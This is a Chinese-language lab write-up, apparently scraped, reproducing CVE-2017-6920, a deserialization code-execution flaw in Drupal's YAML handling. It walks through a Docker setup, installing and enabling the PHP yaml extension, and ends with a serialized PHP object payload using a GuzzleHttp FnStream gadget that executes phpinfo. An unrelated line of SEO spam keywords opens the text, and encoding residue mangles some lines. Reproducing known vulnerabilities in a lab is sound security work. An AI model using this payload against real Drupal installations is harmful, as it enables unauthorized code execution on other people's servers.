九江有哪些免费推广网站,网页开发需要学什么技术,搜索排名影响因素,遵义市 网站建设漏洞描述
影响软件#xff1a;Drupal方式#xff1a;反序列化参考链接#xff1a;CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造效果#xff1a;任意代码执行
漏洞环境及利用
搭建docker环境 环境启动后#xff0c;访问 将会看到drupal的安装页面#xff0c;一路…漏洞描述
影响软件Drupal方式反序列化参考链接CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造效果任意代码执行
漏洞环境及利用
搭建docker环境 环境启动后访问 将会看到drupal的安装页面一路默认配置下一步安装。 因为没有mysql环境所以安装的时候可以选择sqlite数据库。
访问ip:8080 先安装 扩展yaml在容器中 # 换镜像源默认带vim编辑器所以用cat换源可以换成自己喜欢的源
cd /etc/apt
这里官方提供的没有切换路径需要自己切换以下可以cat sources.list看有没有换源成功 cat EOF /etc/apt/sources.list
deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
EOF
这里用阿里云的源网易的失效了
#导入阿里源的公钥否则下一步更新源会报错
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C# 安装依赖
apt update
apt-get -y install gcc make autoconf libc-dev pkg-configapt-get -y install libyaml-dev
# 安装yaml扩展
pecl install yaml
docker-php-ext-enable yaml.so# 启用 yaml.decode_php 否则无法复现成功 echo yaml.decode_php 1 1/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
# 退出容器 exit# 重启容器CONTAINER换成自己的容器ID docker restart CONTAINER payload !php/object O:24:\GuzzleHttp\\Psr7\\FnStream\:2:{s:33:\\0GuzzleHttp\\Psr7\\FnStream\0methods\;a:1:{s:5:\close\;s:7:\phpinfo\;}s:9:\_fn_close\;s:7:\phpinfo\;} phpinfo成功执行漏洞复现成功
